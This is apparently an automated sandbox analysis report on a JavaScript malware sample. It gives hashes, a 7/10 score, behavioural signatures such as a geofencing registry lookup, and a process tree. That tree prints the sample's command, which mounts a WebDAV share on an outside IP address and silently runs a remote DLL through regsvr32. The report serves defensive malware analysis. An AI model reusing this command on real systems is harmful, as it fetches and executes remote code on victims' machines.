Analysis
-
max time kernel
138s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
23/07/2024, 04:39
Static task
static1
Behavioral task
behavioral1
Sample
883530584296995330.js
Resource
win7-20240708-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
883530584296995330.js
Resource
win10v2004-20240709-en
5 signatures
150 seconds
General
-
Target
883530584296995330.js
-
Size
5KB
-
MD5
5d9fe1cc30c385e5ed9f90f990246862
-
SHA1
fa75138769ff13a468d0f71bb91d9909b9750ef8
-
SHA256
28e1d34b10533c6fca6a9497a74a57ecee88ed1166fed7285249dc9b9eab8e71
-
SHA512
d39ff45608b73cc43d9036300767ffcc7f6d8b83d5ab28a028f73f0b61fcfb58f8780d809ec127eaa2be41ca0e3789d698a126654222f1e1bb30edbf2f99ce98
-
SSDEEP
96:fAL5FNGwwxDwqkwPtldkwJC/baAkJOraHpS:fAL53BecqrPtldrJCjaAkJMaHpS
Score
7/10
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4616 wrote to memory of 344 4616 wscript.exe 84 PID 4616 wrote to memory of 344 4616 wscript.exe 84 PID 344 wrote to memory of 3152 344 cmd.exe 86 PID 344 wrote to memory of 3152 344 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\883530584296995330.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\88291401818019.dll2⤵
- Suspicious use of WriteProcessMemory
PID:344 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:3152
-
-